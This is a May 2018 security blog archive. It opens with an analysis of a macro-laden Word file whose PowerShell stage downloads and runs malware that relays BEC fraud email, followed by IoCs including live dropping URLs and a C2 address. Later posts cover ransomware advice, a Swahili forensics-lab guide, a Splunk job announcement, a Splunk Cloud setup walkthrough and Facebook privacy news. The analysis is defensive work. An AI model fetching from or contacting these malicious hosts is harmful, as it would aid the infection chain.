Monthly Archives: May 2018

MalHide: an interesting Malware sample

Today I'd like to share an interesting (at least to me) analysis on a given sample. I have called this sample MalHide but you will see "why" only at the end of my post :D. I believe this is a quite interesting Malware since it firstly implements several obfuscation stages by using different obfuscation techniques and secondly it implements a quite new attack path (not new per-se but new on opportunistic malware families) where the attacker doesn't want to steal informations and/or compromise a system for possession and/or destruction but the attacker uses the compromised system as eMail relay in order to hide the attacker networks. It is amazing to figure out that attackers are primary moving on fraud direction. For example, having a successful privilege access on the victim machine, the attacker might decide to performa several malicious actions, but among all the choices, he decides to spawn a SMTP relay to send anonymously fraud emails. Based on my past experience this is quite wired, isn't it ?!

Disclaimer: I'm not going into details on every steps since I'am not writing a tutorial but mostly I'd like to prove that threats are getting more and more complex on relative short time and that attack path is quite unique at least for my personal experience.

Everything started from an eMail attachment. "Nuovo Documento.doc" is its name and it is able to bypass every single AntiSpam and AntiMalware engine the target had. The following image shows the initial stage where the ".DOC" file seems to be benign but not compatible with the running Microsoft Word instance.

Sample as it looks like on opening. Stage 1

The sample presents some macro functions on it. Many junk functions have been injected on the VBA side in order to make life harder to reverse engineers, bu fortunately the great Microsoft VBA Editor included in the Microsoft Office suite implements an useful debugger. The analyst observes that the AutoOpen() function is preserved and filled by code. It took almost 3 seconds to figure out it was a malicious code. The following image shows the Microsoft VBA Editor debugging view where  is possible to appreciate the variable qZbTUw containing a PwerShell encoded code. Here we are ! The second stage is approaching to the victim.

Stage 2. A running instance of PowerShell invoked by VBA

The PowerShell code was Base64 Encoded and additionally obfuscated through "variable mess". This technique is quite common for  javascript devs since the code they develop runs on client side and obfuscating code is used technique to protect (sort of) the written code, but on the given scenario it looks like a simple implementation of FileLess Staging, where the attacker runs a powershell script directly from memory without saving it on HD, in such a way the victim does not need to enable the "running powershell from file" Microsoft register key and it's much harder from AntiVirus detect the infection stage. Then the script  fires it on following the infection. Powershell ISE helps us to reverse the dropped payload. The following images show the decoding process: from the single line of obfuscated code to dropping URLs. I know, it's almost impossible to see the images since they looks like small, but please click on them to make a bigger view,  if you wish.

Stage 3. Decoding Powershell Drop-and-Execute


Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to IoC section) ! The executed actions are quite standard. From an array of dropping website lets cycle over them and take the one who drops ! The cycling policy could differ from sample to sample since they could use a pseudo-random seed generator or adopting an increment rotation or a round robin rotation and son. For this analysis is not interesting cycling policy at all since we decoded all the possible dropping files. The Powershell command gets the 52887.exe from external source (dropping websites) and places it on C:\Users\Public\52887.exe. Finally it runs it. The Stage 4 is began, a new PE sample has been executed. The following image shows the Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately this stage drops the code from itself without getting on network side. The fonduewwa.exe is then executed.

Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe

The new stage (Stage 4) performs the following steps:

1) It fires up services which acts as SMTP client.
2) Connects to a Command and Control which provides emails addresses, SMTP relays, and eMails body to be sent.
3) Sends eMail to exploit BeC communications.

The following images show the Command and Control address. The first image shows the used Windows API while the second one addresses the opened connections directly on the infected machine.

Command and Control IP Address (click to make it bigger)

Command and Control DNS resolution (click to make it bigger)


The Command and Control (c2) listens to: c-67-176-238-209.hsd1.il.comcast.net which today resolves in: 67.176.238.209. The C2 seems to answers to http queries having a specific set of cookies as the following image shows. The C2 crafted and rebuilt communication, made possible by reconstructing cookies from sniffed internal communications, gets back from C2 a kB of encoded data.

Command and Control Communication through HTTP

From C2 comes actions, victims addresses, SMTP servers and passwords. The sample connects to a given SMTP relays, it authenticate itself and sends email to the victims. The following images proves that the attackers have plenty credentials to SMTP relays around the globe.

Connection to real SMTP releys

As now I will not disclose Username e Password for getting access to SMTP relays, but if you can prove to be the owner (or at least to be working for the company owning) of one of them let's have a chat on that, many interesting things are happening into your network. The emails sent from the analysed sample are targeting specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BeC (or CEO Scam) to specific targets. For those of you not familiar with this attack I am copying the definition provided by SANS (here).
"Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT.Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very  small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive. These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone."

Following few examples of the sent emails coming from C2 and delivering through the analysed sample.


Here we are, another email has been sent, another Malware have been thought and developed, another analysis I've been made but this time it looks like the "Malware economy" is seriously moving to fraud, there is much money respect to information stealing which is an ancient and romantic way to attack victims. Is this attack a significative example expressing the will of the new underground economy ? Is this attack a small and silent change of paradigm, where previously the attacker was interested to your data in order to sell them but now he gets more interested on fraud third parties (such as companies) through you ? I do not have such answer here.

Ok, now it's time to explain why I called this Malware MalHide. Well it's a complex Malware, it hides itself several times BUT most important it has been developed to hide the attacker from sending emails in a way that is not possible to trace back the Attacker IP from the attack path. So I believe MalHide would be a nice name :D

IoCs:

Samples:

  • 2f1f03b4afde643b2ed798e62f4718b0a285b8a8
  • e6b1a4b09613f1729782f1b2c04a30ad5ff30200
  • da39a3ee5e6b4b0d3255bfef95601890afd80709
Dropping URLs:
  • http://oddbods.co.uk/D6yd9x/
  • http://136.243.206.64
  • http://166.63.0.27
  •  http://136.243.206.64
  • http://promoclass.it/ACCOUNT/Invoice-161021407-Invoice-date-052518-Order-no=-06146166318/
Local Path:
  • C:\Windows\SysWOW64\fonduewwa.exe
  • C:\Users\Public\52887.exe
C2:
  • 67.176.238.209
  • c-67-176-238-209.hsd1.il.comcast.net
SMTP (contacted to send eMails, those are not malicious per-se !):
  • 186.1.11.125 (smtp.echamorro.com.ni)
  • 192.243.105.21 (mail.mcmillins.com)
  • 209.91.128.17 (mail.maslack.com)
  • 64.8.70.103 (mail.tds.net)
  • 208.80.38.254 (pop.spiderhost.com)
  • 193.252.22.84 (smtp.orange.fr)
  • 199.103.57.167 (mail.mytravelclinic.com)
  • 149.115.16.7 (mail.transamericanengineers.com)
  • 68.99.120.8 (mail.coxmail.com)
  • 74.125.71.108 (smtp.gmail.com)
  • 76.12.209.196 (mail.gachivvis.com)
  • 107.14.166.78 (pop.biz.rr.com)
  • 64.39.128.67 (mail.syrupcity.net)
  • 107.180.3.218 (mail.rutledge-associates.com)
  • 165.212.120.200 (exchange.postoffice.net)
  • 64.35.208.130 (smtp.atcnet.net)
  • 207.204.50.27 (mail.cabstore.biz)
  • 216.52.72.118 (smtp.zoho.com)
  • 209.237.135.167 (mail.astarabatement.com)
  • 107.14.166.72 (smtp.twcny.rr.com)
  • 74.208.5.2 (smtp.1and1.com)
  • 209.123.49.115 (ssl.datamotion.com)
  • 208.92.193.92 (mail.hdap.ca)
  • 68.178.213.37 (smtp.secureserver.net)
  • 72.167.238.29 (smtp.secureserver.net)
  • 66.226.70.67 (pop.doubleolaser.com)
  • 205.178.146.249 (mail.boersmatravel.com)
  • 173.201.192.229 (smtpout.secureserver.net)
  • 64.59.128.135 (mail.shaw.ca)
  • 69.156.240.33 (mail.bestelectric.ca)
  • 38.123.104.66 (smtp.263.net)
  • 184.106.54.11 (smtp.emailsrvr.com)
  • 184.106.54.10 (secure.emailsrvr.com)
  • 209.237.135.166 (webmail5.myregisteredsite.com)
  • 74.125.133.16 (pop.googlemail.com)
  • 68.178.252.229 (smtpout.secureserver.net)
  • 64.20.48.173 (mail.expertforccna.com)
  • 72.47.216.15 (smtp.newalbanyelitedental.com)
  • 66.102.1.109 (pop.gmail.com)
  • 205.207.122.80 (mail.connection.ca)
  • 182.50.145.3 (smtpout.asia.secureserver.net)
  • 74.125.133.109 (imap.gmail.com)
  • 74.6.141.48 (smtp.att.yahoo.com)
  • 193.252.22.86 (smtp.orange.fr)
  • 68.178.252.101 (smtpout.secureserver.net)
  • 69.4.62.69 (pop.kerrcad.org)
  • 69.168.106.36 (smtp.windstream.net)
  • 188.125.73.26 (smtp.mail.yahoo.com)
  • 65.254.254.53 (mail.fatcow.com)
  • 65.254.254.52 (mail.fatcow.com)
  • 69.49.123.241 (mail.salzburginteriors.com)
  • 207.29.219.108 (mail.bayou.com)
  • 198.57.169.26 (bst-hosting.com)
  • 207.223.121.25 (mail.cloudopscenter.com)
  • 207.204.50.18 (mail.reliusmed.com)
  • 208.180.150.85 (mail.lrgriffin.com)
  • 217.15.86.61 (mail.roche-bobois.com)
  • 204.8.72.128 (mail.gdins.org)
  • 66.96.160.206 (pop.seriousfunnyc.org)
  • 66.175.58.40 (mail.mhpwq.org)
  • 207.204.50.11 (mail.prestonequipment.com)
  • 208.89.138.22 (m.ivenue.com)
  • 205.178.146.235 (mail.holstongases.com)
  • 68.15.34.125 (mail.jancompanies.com)
  • 212.82.101.35 (smtp.verizon.net)
  • 192.185.4.163 (gator4151.hostgator.com)
  • 137.118.58.15 (pop.totelcsi.com)
  • 207.69.189.23 (smtp.ix.netcom.com)
  • 68.87.20.6 (smtp.comcast.net)
  • 65.254.250.110 (smtp.franklintonnc.us)
  • 66.118.64.100 (smtp.citynet.net)
  • 173.203.187.10 (pop.emailsrvr.com)
  • 173.15.144.57 (mail.pembertonpolice.com)
  • 173.203.187.14 (mail.sbctransportation.com)
  • 72.52.250.187 (www11.qth.com)
  • 68.178.213.203 (smtp.secureserver.net)
  • 64.78.61.107 (mail16.intermedia.net)
  • 165.212.11.125 (smtp.postoffice.net)
  • 72.35.23.61 (pop.callta.com)
  • 206.188.198.65 (mail.bayoubendtx.com)
  • 65.254.250.100 (pop.powweb.com)
  • 64.29.151.235 (mail.arizoncompanies.com)
Used eMails (sender):
  • helene.valeze@wanadoo.fr
  • mehdi.audam@wanadoo.fr
  • dominique.derbord@wanadoo.fr

RISING SHIELD AGAINST RANSOMWARE ATTACKS



IN BRIEF: Both Atlanta’s network and Roseburg schools suffered with Ransomware attacks recently. These are two examples among many ransomware attacks facing organisations across the globe. This writing will provide three basics advise on how individual and organisations can fight against ransomware attacks.
--------------------------------------------

Early this year 2018, Secureworks published a report titled “SamSam Ransomware Campaigns,” which noted that the recent attacks involving SamSam have been opportunistic, lucrative and impacted a wide range of organizations.

On March 22 this year (2018), The city of Atlanta (GA) employees were ordered to turn off their computers to stop a virus from spreading through the network and encrypting data. A cybercriminal group demanded that the city pay it about $51,000 in bitcoins — a crypto currency that allows for anonymous transactions online.

Federal agents advise the city not to pay ransomware because paying will not be an assurance of the solution to the city’s problem – The city then refuses to pay ransom to cybercriminals.



Following the attack, the city hired Secureworks, a Dell subsidiary, who has emerged as an early authority on the cyber-criminal group, “Gold Lowell.” That group is being blamed for a rash of cyber-attacks involving a variant of SamSam, the type of ransomware that struck Atlanta.


The total cost of the attack has yet to be calculated. But emergency contracts posted on the city’s procurement website have a combined not-to-exceed amount of about $5 million – Said Chief Operating Officer, Richard Cox.

The City is ongoing recovery from a ransomware cyber-attack – the municipal court is the only department whose computers haven’t been brought back online. “We are in testing right now,” Cox said, adding that he expects them to be operational in about 10 days.


The other accident took place in ROSEBURG, Ore – The Roseburg Public School's computer system suffered a ransomware attack happened earlier this month, freezing access to the district's email system, website and business and accounting software.

District officials say employee information was not accessed, but they don't know how much data they'll be able to get back.

"They don't hold out a lot of hope that they will be able to prosecute them, and they made it very clear to us that they couldn't help us recover our data," said Gerry Washburn, the Roseburg Schools Superintendent.

The FBI advised the district not to pay the ransom to recover the data. The district regained access to its email this week and plans to have to website back up as early as next week.

The Federal Bureau of Investigation (FBI) is now investigating the incident.



ADVISE: IMPROVING CYBERSECURITY.

There are number of things one can put in place in the name of improving cybersecurity – I will emphasize on three among many as follows.

Regularly update your operating system

Your operating system or OS is central command for your desktop, laptop, or smartphone. It’s the Captain Kirk of your devices. Unsurprisingly, it’s a prime target for hackers. Access to your OS means cyberthieves “have the conn” to your computer. They can download, install, and otherwise exploit your workstations. Taking control is how hackers steal your data.

Regularly updating your OS applies critical security fixes to your Windows, Mac, or Linux software. Make your work life easier by setting up automatic updates to your OS. With this simple adjustment to your work habits, you’ll “boldly go where no one has gone before” with your cybersecurity skills.

Get antivirus software – From reputable sources.

You can do the most to protect your employer by installing antivirus software, which protects work devices from phishing emails, spyware, botnets, and other harmful malware. But first, talk to your employer about getting comprehensive cybersecurity solution. For your personal devices, consider getting your own antivirus software. Most major antivirus brands offer free downloads of basic plans.

Just like any of your work projects, cybersecurity is a team effort that needs everyone to contribute. These five cybersecurity tips for the workplace are just a jumping-off point for your overall improvement. You now have the basics covered. Expand your cybersecurity arsenal with additional cybersecurity tips and online resources. Make sure you’re doing your part and everyone at work will benefit



Back up your data regularly

Ransomware is on the rise, affecting businesses of every size and type. Enterprising cybercriminals hack into computers, encrypt the data inside, and hold it for ransom. It’s a lucrative practice that costs employers millions every year. But regularly backing up your employer’s data takes away the profit incentive.

Use both a physical and cloud-based drive for backups. If one drive is hacked, you’ll have the other available. Most backups to the cloud sync your data automatically and let you choose which folders to upload. Talk with your employer about which files need to be backed up and which can remain locally stored. Set up a regular maintenance schedule to review your backup plans.


MAABARA YA UCHUNGUZI WA MAKOSA YA DIGITALI



KWA UFUPI: Andiko hili litaangazia walau kwa mukhtasari mambo muhimu ya kuzingatia wakati wa kuanzisha/ Kujenga maabara ya uchunguzi wa makossa ya digitali itakayo weza kufanikisha uchunguzi wa makossa hayo.
-------------------------------------------

Maabara ya uchunguzi wa makossa ya digitali situ inahitajika katika ngazi ya kitaifa bali pia makampuni yanaweza kuwa nayo ili kuweza kutafuta majibu ya uhalifu mtandao unaoweza kujitokeza.

Mataifa mengi yamejielekeza kwenye kujenga na kuongezea nguvu/uwezo  maabara maalum za uchunguzi ma makossa ya digitali – Nilipata kuzungumzia kwenye andiko linalosomeka “EGYPT LAUNCHES NEWDIGITAL FORENSICS LAB”  hatua ya Nchi ya misri kuzindua maabara ya kisasa ya uchunguzi wa makossa ya digitali.


Hii ni kutokana na ukuaji wa ufanyikaji wa makossa hayo yanayo hitaji umakini wa hali ya juu kuweza kuyachunguza na kupata majibu stahiki. Swali kuu ni ufahamu kiasi gani wahusika wako nao wa kujua mambo yanayo takiwa kuzingatiwa wakati wa kuazisha maabara hizi?



Mambo yafuatayo ni kwa uchache tu kati ya mengi ya kuzingatia wakati wa kuanzisha maabara maalum yenye kazi ya uchunguzi wa kitaalam wa makossa ya digitali.

ENEO – Physical location: Umakini unahitajika wakati wa kuchagua eneo maabara hii malum itawekwa. Eneo lazima liwe karibu na huduma muhimu za dharura, uwepo wa umeme, eneo liwe na udhibiti wa kutoruhusu mtu yoyote kuingia kwenye maabara kirahisi.

Aidha, maabara ya uchunguzi wa makossa ya digitali inakua na sehemu mbili za kufanyia uchunguzi – Moja inakua imeunganishwa na mtandao, ambayo itatumika kufanyia tafiti mbali mbali na mambo mengine yatakayo hitaji mtandao; ya pili inakua haiunganishi na mtandao ambayo kimsingi ndio inatumika kufanyia uchunguzi wa makossa ya digitali.



Kadhalika, Lazima papatikane eneo la wazi ndani ambalo litatoa huduma ya mahojiano na washukiwa wakati wa uchunguzi na pia kutumika kwa ajili ya kufanya mijadala/vikao kwa wachunguzi.

USANIDI WA JUMLA – General configuration: Maabara inapaswa kua na Vifaa vinavyotumia kutunza umeme wakati wa dharura za kukatika umeme yaani UPS, huduma ya mtandao, program muhimu za kuwezesha uchunguzi (Software), maeneo salama ya kuhifadhi vielelezo (Safe locker), mashelfu ya kuhifadhia vifaa vingine pamoja na mashelfu ya kuweka vitabu vya rejea katika maabara.

Aidha, Vifaa kama computer ya uchunguzi (Forensics tower), Printa, nyaya (Cables) mbali mbali muhimu, drive za ziada (Additional hard drives), pamoja na vifaa/ nyenzo nyingine muhumu zitakazo weza kutoa msaada kulingana na aina ya uchunguzi maabara inafanya.


Programu Muhimu – Software:Maambara ya uchunguzi inatarajiwa kuwa na programu kama vile, Window OS,Linux / Unix / Mac OS X / iMac operating system, EnCase, FTK na program nyingine za kusaidia uchunguzi mfano R-drive, SafeBack na nyinginezo zitakazo weza kutoa msaada wa kupatikana majibu ya uchunguzi wa makossa ya digitali kilingana na ina ya uchunguzi unao tarajia kufanya.

Mapendekezo ya ulizi – Physical security:Inashauriwa maabara kua na mlango mmoja tu wa kuingilia na kutokea, kutokufunguliwa kwa madirisha ya maabara, kua na kitabu (Log book) / mfumo wa kugundua kila anaeingia katika maabara ikiwezekana papatikane mfumo/kifaa kitakacho weza kutoa tahadhari kwa atakae ingia kinyemela (intrusion alarm system).


Aidha, kabati (Locker) za kuhifadhia vidhibiti (evidences) zinapaswa kuwepo maeneo yasiyo ingilika kirahisi na wasio husika (restricted area, only accessible to lab personnel) na ungalizi wa karibu sanjari na kufunga makabati (Lockers) wakati hayatumiki.

Bejtlich Joining Splunk


Since posting Bejtlich Moves On I've been rebalancing work, family, and personal life. I invested in my martial arts interests, helped more with home duties, and consulted through TaoSecurity.

Today I'm pleased to announce that, effective Monday May 21st 2018, I'm joining the Splunk team. I will be Senior Director for Security and Intelligence Operations, reporting to our CISO, Joel Fulton. I will help build teams to perform detection and monitoring operations, digital forensics and incident response, and threat intelligence. I remain in the northern Virginia area and will align with the Splunk presence in Tyson's Corner.

I'm very excited by this opportunity for four reasons. First, the areas for which I will be responsible are my favorite aspects of security. Long-time blog readers know I'm happiest detecting and responding to intruders! Second, I already know several people at the company, one of whom began this journey by Tweeting about opportunities at Splunk! These colleagues are top notch, and I was similarly impressed by the people I met during my interviews in San Francisco and San Jose.

Third, I respect Splunk as a company. I first used the products over ten years ago, and when I tried them again recently they worked spectacularly, as I expected. Fourth, my new role allows me to be a leader in the areas I know well, like enterprise defense and digital operational art, while building understanding in areas I want to learn, like cloud technologies, DevOps, and security outside enterprise constraints.

I'll have more to say about my role and team soon. Right now I can share that this job focuses on defending the Splunk enterprise and its customers. I do not expect to spend a lot of time in sales cycles. I will likely host visitors in the Tyson's areas from time to time. I do not plan to speak as much with the press as I did at Mandiant and FireEye. I'm pleased to return to operational defense, rather than advise on geopolitical strategy.

If this news interests you, please check our open job listings in information technology. As a company we continue to grow, and I'm thrilled to see what happens next!

Trying Splunk Cloud

I first used Splunk over ten years ago, but the first time I blogged about it was in 2008. I described how to install Splunk on Ubuntu 8.04. Today I decided to try the Splunk Cloud.

Splunk Cloud is the company's hosted Splunk offering, residing in Amazon Web Services (AWS). You can register for a 15 day free trial of Splunk Cloud that will index 5 GB per day.

If you would like to follow along, you will need a computer with a Web browser to interact with Splunk Cloud. (There may be ways to interact via API, but I do not cover that here.)

I will collect logs from a virtual machine running Debian 9, inside Oracle VirtualBox.

First I registered for the free Splunk Cloud trial online.

After I had a Splunk Cloud instance running, I consulted the documentation for Forward data to Splunk Cloud from Linux. I am running a "self-serviced" instance and not a "managed instance," i.e., I am the administrator in this situation.

I learned that I needed to install a software package called the Splunk Universal Forwarder on my Linux VM.

I downloaded a 64 bit Linux 2.6+ kernel .deb file to the /home/Downloads directory on the Linux VM.

richard@debian:~$ cd Downloads/

richard@debian:~/Downloads$ ls

splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb

With elevation permissions I created a directory for the .deb, changed into the directory, and installed the .deb using dpkg.

richard@debian:~/Downloads$ sudo bash
[sudo] password for richard: 

root@debian:/home/richard/Downloads# mkdir /opt/splunkforwarder

root@debian:/home/richard/Downloads# mv splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb /opt/splunkforwarder/

root@debian:/home/richard/Downloads# cd /opt/splunkforwarder/

root@debian:/opt/splunkforwarder# ls

splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb

root@debian:/opt/splunkforwarder# dpkg -i splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb 

Selecting previously unselected package splunkforwarder.
(Reading database ... 141030 files and directories currently installed.)
Preparing to unpack splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb ...
Unpacking splunkforwarder (7.1.0) ...
Setting up splunkforwarder (7.1.0) ...
complete

root@debian:/opt/splunkforwarder# ls
bin        license-eula.txt
copyright.txt  openssl
etc        README-splunk.txt
ftr        share
include        splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb
lib        splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest

Next I changed into the bin directory, ran the splunk binary, and accepted the EULA.

root@debian:/opt/splunkforwarder# cd bin/

root@debian:/opt/splunkforwarder/bin# ls

btool   copyright.txt   openssl slim   splunkmon
btprobe   genRootCA.sh   pid_check.sh splunk   srm
bzip2   genSignedServerCert.sh  scripts splunkd
classify  genWebCert.sh   setSplunkEnv splunkdj

root@debian:/opt/splunkforwarder/bin# ./splunk start

SPLUNK SOFTWARE LICENSE AGREEMENT

THIS SPLUNK SOFTWARE LICENSE AGREEMENT ("AGREEMENT") GOVERNS THE LICENSING,
INSTALLATION AND USE OF SPLUNK SOFTWARE. BY DOWNLOADING AND/OR INSTALLING SPLUNK
SOFTWARE: (A) YOU ARE INDICATING THAT YOU HAVE READ AND UNDERSTAND THIS

...

Splunk Software License Agreement 04.24.2018

Do you agree with this license? [y/n]: y

Now I had to set an administrator password for this Universal Forwarder instance. I will refer to it as "mypassword" in the examples that follow although Splunk does not echo it to the screen below.

This appears to be your first time running this version of Splunk.

An Admin password must be set before installation proceeds.
Password must contain at least:
   * 8 total printable ASCII character(s).
Please enter a new password: 
Please confirm new password: 

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Creating: /opt/splunkforwarder/var/lib/splunk
Creating: /opt/splunkforwarder/var/run/splunk
Creating: /opt/splunkforwarder/var/run/splunk/appserver/i18n
Creating: /opt/splunkforwarder/var/run/splunk/appserver/modules/static/css
Creating: /opt/splunkforwarder/var/run/splunk/upload
Creating: /opt/splunkforwarder/var/spool/splunk
Creating: /opt/splunkforwarder/var/spool/dirmoncache
Creating: /opt/splunkforwarder/var/lib/splunk/authDb
Creating: /opt/splunkforwarder/var/lib/splunk/hashDb
New certs have been generated in '/opt/splunkforwarder/etc/auth'.
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

With that done, I had to return to the Splunk Cloud Web site, and click the link to "Download Universal Forwarder Credentials" to download a splunkclouduf.spl file. As noted in the documentation, splunkclouduf.spl is a "credentials file, which contains a custom certificate for your Splunk Cloud deployment. The universal forwarder credentials are different from the credentials that you use to log into Splunk Cloud."

After downloading the splunkclouduf.spl file, I installed it. Note I pass "admin" as the user and "mypassword" as the password here. After installing I restart the universal forwarder.

root@debian:/opt/splunkforwarder/bin# ./splunk install app /home/richard/Downloads/splunkclouduf.spl -auth admin:mypassword

App '/home/richard/Downloads/splunkclouduf.spl' installed 

root@debian:/opt/splunkforwarder/bin# ./splunk restart
Stopping splunkd...
Shutting down.  Please wait, as this may take a few minutes.
.......
Stopping splunk helpers...

Done.

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

It's time to take the final steps to get data into Splunk Cloud. I need to forwarder management in the Splunk Cloud Web site. Observe the input-prd-p-XXXX.cloud.splunk.com in the command. You obtain this (mine is masked with XXXX) from the URL for your Splunk Cloud deployment, e.g., https://prd-p-XXXX.cloud.splunk.com. Note that you have to add "input-" before the fully qualified domain name used by the Splunk Cloud instance.

root@debian:/opt/splunkforwarder/bin# ./splunk set deploy-poll input-prd-p-XXXX.cloud.splunk.com:8089

Your session is invalid.  Please login.
Splunk username: admin
Password: 
Configuration updated.

Once again I restart the universal forwarder. I'm not sure if I could have done all these restarts at the end.

root@debian:/opt/splunkforwarder/bin# ./splunk restart
Stopping splunkd...
Shutting down.  Please wait, as this may take a few minutes.
.......
Stopping splunk helpers...

Done.

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

Finally I need to tell the universal forwarder to watch some logs on this Linux system. I tell it to monitor the /var/log directory and restart one more time.

root@debian:/opt/splunkforwarder/bin# ./splunk add monitor /var/log
Your session is invalid.  Please login.
Splunk username: admin
Password: 
Added monitor of '/var/log'.

root@debian:/opt/splunkforwarder/bin# ./splunk restart

Stopping splunkd...
Shutting down.  Please wait, as this may take a few minutes.
...............
Stopping splunk helpers...

Done.

Splunk> Map. Reduce. Recycle.

Checking prerequisites...
Checking mgmt port [8089]: open
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done

At this point I return to the Splunk Cloud Web interface and click the "search" feature. I see Splunk is indexing some data.


I run a search for "host=debian" and find my logs.


Not too bad! Have you tried Splunk Cloud? What do you think? Leave me a comment below.

Update: I installed the Universal Forwarder on FreeBSD 11.1 using the method above (except with a FreeBSD .tgz) and everything seems to be working!

FACEBOOK REMOVES MALICIOUS ACCOUNTS



IN BRIEF: Facebook Inc has removed several malicious accounts and pages that advertised and sold social security numbers, addresses, phone numbers, and alleged credit card numbers of dozens of people and it will continue to do it if so needed.
----------------------------------------

Facebook spokesman assured to remove Posts containing information like social security numbers or credit card information on Facebook when Facebook becomes aware of it.

Facebook has also deleted almost 120 private discussion groups of more than 300,000 members, after being alerted by a report from journalist Brian Krebs that the groups flagrantly promoted a host of illicit activities, including spamming, wire fraud, account takeovers, and phony tax refunds.

The biggest collection of groups banned were those promoting the sale and use of stolen credit and debit card accounts, and the next largest collection of groups included those facilitating takeovers for online accounts such Amazon, Google, Netflix, and PayPal.

A Google search still pulls up a few public Facebook posts that offer to sell personal details including credit card numbers.


Hackers have advertised databases of private information on the social platform and that Facebook has held stolen identities and social security numbers for years.

It is reported, at least some of the data in these posts appeared real and it was confirmed the first four digits of the social security numbers, names, addresses, and dates of birth for four people whose data appears in a post from July 2014.

Tech companies are under intense scrutiny about how they protect customer data after Facebook was embroiled in a huge scandal where millions of users’ data were improperly accessed by a political consultancy.

KEEP PERSONAL INFORMATION SAFE ON SOCIAL MEDIA


The big question most people asks – Who is responsible to protect one’s privacy? It should be known that everyone is responsible to protect his/her own privacy.

How do you do that? 
Treat the “about me” fields as optional.
Know the people you friend.
Become a master of privacy settings.
Create strong, private passwords.
Create and use an “off-limits” list.
Always log out when you’re done.
Limit/ deny access to third-part applications.
Get Alerts on Suspicious Activity. 




FACEBOOK F8 DEVELOPER CONFERENCE

It is shaping up to be the biggest Facebook event ever, with 5,000 developers flying in from around the world. They will hear exciting news about the company's plans to advance on many fronts, from artificial intelligence to virtual reality.

They'll also get the chance to interact with the senior team, and to find out how they can profit from this very powerful platform.


Last year, Mark Zuckerberg filled his F8 keynote speech with cool demos about augmented reality – This year's F8, he said he is going to share more about the work Facebook is doing to keep people safe, and to keep building services to help individuals connect in more meaningful ways.